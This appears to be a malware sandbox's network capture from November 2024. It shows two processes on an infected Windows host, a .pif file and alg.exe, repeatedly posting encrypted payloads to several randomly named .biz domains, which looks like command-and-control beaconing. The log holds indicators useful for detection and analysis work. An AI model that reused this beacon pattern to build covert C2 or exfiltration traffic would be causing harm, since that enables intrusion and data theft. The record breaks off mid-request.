Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
5           192.168.2.8  49713        172.234.222.138  80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:23:28.562653065 CET  359                OUT        POST /pywymqfnuombtvtm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:28.562680006 CET  802                OUT        Data Raw: f3 e2 41 90 8e 46 b6 91 16 03 00 00 8c c3 68 7a 95 ef cd 14 7a 0d 74 3b 9e 91 35 44 c6 59 81 60 4e 89 db 7a f9 7b 2d d4 4e d6 55 6b 42 e2 f6 c8 51 08 7c 74 77 d6 16 19 d5 b4 e6 a8 e4 38 b2 31 8b f7 b8 1f 57 14 22 c8 4a fb 75 97 9d c0 60 10 87 2d
Data Ascii: AFhzzt;5DY`Nz{-NUkBQ|tw81W"Ju`-O[$>zg5(dj o`2lv8~Ua?s&Wcu}>Wq6]F>sZw)"^D f*fM|" tsJ`{QzS\--


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.8  49714        18.141.10.107    80                4916  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:23:28.571266890 CET  351                OUT        POST /luqhjxxa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:28.571294069 CET  778                OUT        Data Raw: 5f 10 4f d1 f9 27 9d 6d fe 02 00 00 46 f9 54 57 b9 8d d9 a9 87 e9 40 2d f6 45 43 d8 9a b2 83 ae 02 e9 07 59 67 3c ff 41 4e 16 91 ae 4f c4 33 13 d1 b8 5f a1 33 df 73 17 44 f7 4f d3 fa e4 84 24 86 87 bf b6 ab 20 5f 75 8d d3 86 bd b7 39 93 73 85 01
Data Ascii: _O'mFTW@-ECYg<ANO3_3sDO$ _u9sbxN`uyx{Jwc\ ZAu\g/B?1f,Qfv7dK=Pj[%"Vx=povMy!u|(P
Nov 1, 2024 08:23:30.006846905 CET  415                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=66f145c819b8cb61bd6f5bc4980c7d8b|173.254.250.82|1730445809|1730445809|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49715 | 172.234.222.138 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:29.261008024 CET | 346 | OUT | POST /fnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:29.261022091 CET | 802 | OUT | Data Raw: 02 a4 cc 97 1f c0 65 4e 16 03 00 00 58 f0 3a a4 a4 ea 82 9c d5 db 66 49 c8 34 ca fa 18 4f 01 bd 89 a4 1d 51 83 50 2c 2f de 70 05 49 fb c0 88 24 d5 0f 1d da 0e 19 6b 46 5e bc 5a 74 c0 f1 08 52 d7 81 19 77 14 32 c1 2a d7 db 3b 11 12 bd 37 c7 f4 c1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eNX:fI4OQP,/pI$kF^ZtRw2*;7&|`3#=-@(gD/5B7G*wN+~8cfrvpXlL( dZU!U]&g>]g XdH: `+dzVRwh)<N


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49717 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:29.951155901 CET | 346 | OUT | POST /ln HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:29.951333046 CET | 802 | OUT | Data Raw: 11 67 57 9e af 3a 14 0a 16 03 00 00 ae 72 e6 4b 47 0e 22 12 ec 09 ad ab c9 c8 61 ee 9c e0 e0 c6 75 36 46 1e 59 2b 38 d2 8c a1 d1 8e ed 94 b6 79 97 a9 2b e7 65 0a f3 45 46 45 63 76 68 e8 5a 9f d9 f7 8d 69 c9 dc eb 62 60 ac db 5f b3 49 f9 77 df 6b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gW:rKG"au6FY+8y+eEFEcvhZib`_Iwkc%&pe*k6WOj5=jUo pwaQk/&(REkIliYHwM_Kr;|J!H`)3H#ol,IK[Tj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49718 | 54.244.188.177 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:30.160603046 CET | 353 | OUT | POST /uqcynitxoaix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:23:30.160624027 CET | 778 | OUT | Data Raw: 81 e9 2e 96 a7 c3 f4 86 fe 02 00 00 77 4d 18 77 b0 24 74 3a 42 c2 eb 91 2c 19 e7 a2 4d cb 34 5f 4d fb 0d e3 55 9d 56 37 a8 44 8e 9a 6e 55 6b ea 18 f8 d2 c8 09 8d 7e 23 e1 f4 71 29 a4 2c 90 27 bf 3a a2 bb 5b b4 07 92 24 06 7e 2c 73 e6 68 c3 79 c3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .wMw$t:B,M4_MUV7DnUk~#q),':[$~,shyIM+oVho4.I$O;o;'4al;gVI6Q["h,'v8_vc;@&XkJ)fOvG)%jlpL;(\/Ff:OVbhuU
Nov 1, 2024 08:23:30.989990950 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c0adb617a4fb2bf862e9419cb10d0c00|173.254.250.82|1730445810|1730445810|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49721 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:31.061543941 CET | 347 | OUT | POST /rlj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:31.061563969 CET | 802 | OUT | Data Raw: 82 3d db 84 2e ac 71 59 16 03 00 00 e1 5b ef 91 76 d4 1c 03 68 55 9e 50 2e 49 c3 72 be a7 e6 b0 01 74 33 1c 59 2a fb a1 f6 0d 6c 95 22 51 47 71 2e cc a0 38 d3 16 73 39 dc c3 57 f1 79 62 c6 0f 59 30 36 a3 17 82 fc 3d fe 6e a7 fa 76 a3 b4 5c be ce
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =.qY[vhUP.Irt3Y*l"QGq.8s9WybY06=nv\@kuljUky'f}F^Pfc$i:Z&"M&mL>}<9$U& B^mmLO"=(aQP3X4|x_
Nov 1, 2024 08:23:32.494748116 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
Date: Fri, 01 Nov 2024 07:23:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e83d7f03c4bd2ed734410e0e18b9f629|173.254.250.82|1730445812|1730445812|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49722 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:31.107912064 CET | 345 | OUT | POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:31.107944965 CET | 778 | OUT | Data Raw: f4 ef b6 e7 b5 5b ab a3 fe 02 00 00 28 12 65 8b 64 87 b1 6f fd b6 fc 2d 3f fc 0d 9a 08 fc 69 11 80 4c 82 3e 30 b4 80 63 82 73 60 71 ce 5f df 42 7c 1a af 40 9b ee 63 46 2c c3 15 77 3b 63 e6 7a a9 84 9a 6f 17 bc 3e 66 c7 1f aa 6e 0f ce 14 11 1f c0
Data Ascii: [(edo-?iL>0cs`q_B|@cF,w;czo>fnt!-r`Lnnv391C#{kN8rt8c|Tv1l;mY-PQwtgx|RFCh_j[S{_(py&h?e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49723 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:31.261915922 CET | 355 | OUT | POST /rwebgnmbtiq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:31.261960030 CET | 778 | OUT | Data Raw: 3a 2a 46 5c 4c 99 4a 9e fe 02 00 00 6d 4c 2f 4d ad 70 46 b4 bc b7 f5 36 66 0c 59 f7 e7 fd 8c 2b ed 9e 74 cf 90 fa 4c 16 70 b6 39 5c b8 91 b2 11 81 28 31 af ba 76 7d 92 19 9e fe 91 c6 b4 8d dd bc be 4b b5 de 5a 94 18 74 fb 83 f2 12 4e ce 1b c9 fd
Data Ascii: :*F\LJmL/MpF6fY+tLp9\(1v}KZtNQT-|N*XaTS;f:/Ln?I3}'P.?=qL:6P&QPBoYGxPDc0%/wD^u=K1S8jU_=.2T,h:3+
Nov 1, 2024 08:23:31.914427042 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=12109dc7bd7c63cf0b11fd79a5cca861|173.254.250.82|1730445811|1730445811|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49725 | 172.234.222.138 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:32.221102953 CET | 357 | OUT | POST /hmsaqgigfaxqle HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:32.221147060 CET | 778 | OUT | Data Raw: b0 61 d4 18 e7 57 5a 8a fe 02 00 00 65 4f 46 57 2b c5 94 02 1b f9 7b 65 46 96 37 9b 69 80 d9 f8 08 0e 99 d7 e8 e1 95 57 06 b5 be e2 44 62 65 9a 6f 3c 51 07 5d 88 06 6e c8 5f 66 20 57 a8 85 6c 05 39 09 ed ae f4 bb 0a a0 6d 43 5e bd 67 16 e1 2e 6b
Data Ascii: aWZeOFW+{eF7iWDbeo<Q]n_f Wl9mC^g.k:*S}v`Qd1Rd/8xT%v=<<"uXmW`y!P|"K2<v20450Q`noQEu}UxdSILvhl O<i4I-42N&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49728 | 82.112.184.197 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:33.669454098 CET | 353 | OUT | POST /gcpevfxhbnb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:33.669485092 CET | 802 | OUT | Data Raw: fb 0f 9c c5 4f 56 3f b9 16 03 00 00 3e dc 73 c3 d9 24 d4 de 37 65 31 d0 8b 20 bb af 43 bf 4d f4 ac bd 2f 4f bf 3c 88 29 54 05 35 f4 22 ab 7f fe cd a2 86 e9 7c 6e fa f9 92 cb 05 54 4a d4 a2 0e 5c 09 dc 82 02 e6 5a d6 bd 09 fc a8 d1 c6 c4 a5 e9 c8
Data Ascii: OV?>s$7e1 CM/O<)T5"|nTJ\ZL+}6E-t6jBy@'wz20k?VuslpqFHC3?tT=Dx6E~e>X5KOg0J[@@."Y9!P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49729 | 172.234.222.138 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:33.669609070 CET | 352 | OUT | POST /tpnpycqre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:33.669661045 CET | 778 | OUT | Data Raw: e8 db 8d c6 5d 42 4c f1 fe 02 00 00 cb 05 58 b3 82 d9 bd 1d fc 71 cc 08 90 41 a5 6a 7a e6 d6 39 66 ba 10 c9 7a 4c b8 1a d5 f9 58 e8 27 93 ef 83 2f 51 1a 6a fd 24 46 7c a6 19 c6 19 f1 31 d2 7f 8b d5 89 bd 8f e7 d9 65 5e 4f 64 a8 d3 4e 2a 76 40 07


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49731 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:34.843611002 CET | 349 | OUT | POST /idnuv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:34.843650103 CET | 778 | OUT | Data Raw: 0a a9 ab 76 53 ef b0 20 fe 02 00 00 49 40 5c b8 4f ee aa 68 14 a4 2f 47 f5 43 07 a5 f7 a4 e1 a0 26 57 7c c4 00 f8 c0 af da b5 a3 c4 ae c5 ad 33 bb f2 d4 eb 6b ec c6 9a f3 02 d0 3a b0 3a 1c 76 2e 05 df 37 8a 22 91 45 8d 3a 41 8a 66 e4 75 a9 56 18
Nov 1, 2024 08:23:36.270754099 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=96afb36215c8160bd49f91435305c047|173.254.250.82|1730445815|1730445815|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49732 | 82.112.184.197 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:35.056054115 CET | 358 | OUT | POST /ifmujtvaxdtknray HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:35.056054115 CET | 802 | OUT | Data Raw: 5f b1 4d f0 13 36 15 d4 16 03 00 00 8c 32 de 24 67 95 d0 73 21 36 a3 ef 3c db e1 00 12 dc 60 60 63 34 0d ea 91 d6 af 1d 2f f9 96 6f 48 7f 70 b4 9b 59 b3 cf 4f 85 a4 2f 30 19 3b a6 7d 79 bf 44 c3 09 ad 51 0c 64 48 7c ce 0e 42 2b bf 8f 70 fa 7c c5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49733 | 82.112.184.197 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:37.514158964 CET | 343 | OUT | POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:37.514182091 CET | 778 | OUT | Data Raw: 02 01 4d 41 d0 11 f7 f5 fe 02 00 00 73 3d bc b9 bc 20 51 00 1d 33 e8 d0 48 01 f9 89 22 f0 f2 d1 9c c5 c6 97 78 b8 6a 7d 1c b0 5e 82 db bc 43 65 fa 0d 9f c3 7e 62 d0 19 53 f0 cf 4a 18 73 e0 81 18 f5 7e 8e 47 dc 7a 63 96 59 7f b5 65 df 64 12 13 11


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49734 | 82.112.184.197 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:39.058592081 CET | 355 | OUT | POST /qrcvkhcipj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:39.058623075 CET | 802 | OUT | Data Raw: 49 3b a3 9e 47 ef ba 03 16 03 00 00 e8 27 c9 85 ce 52 c7 aa c8 e1 c3 c5 d7 0e 2e 19 87 0d 56 d1 89 b1 59 0a b4 18 16 15 68 6e 1e d7 5f 63 51 40 7f 50 f9 32 8f 68 9b 76 5d c5 5c cb c8 09 db 40 1f 4e 11 c7 83 30 29 d8 0f de 1e bf 04 bd 8f a4 1d 1e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49735 | 82.112.184.197 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:43.240446091 CET | 360 | OUT | POST /lurykvmwmoqvfvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49736 | 82.112.184.197 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:46.138474941 CET | 343 | OUT | POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49737 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:47.063050985 CET | 345 | OUT | POST /ou HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:48.554986954 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=94872b5c152c65e8c51b3b3ab6ee3056|173.254.250.82|1730445828|1730445828|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49738 | 82.112.184.197 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:47.398230076 CET | 352 | OUT | POST /rnsuojk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49739 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:48.603535891 CET | 345 | OUT | POST /shc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:50.029498100 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7296ef8c863732edc96552c0f3b26340|173.254.250.82|1730445829|1730445829|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49740 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:50.070266008 CET | 353 | OUT | POST /vhkhfdko HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
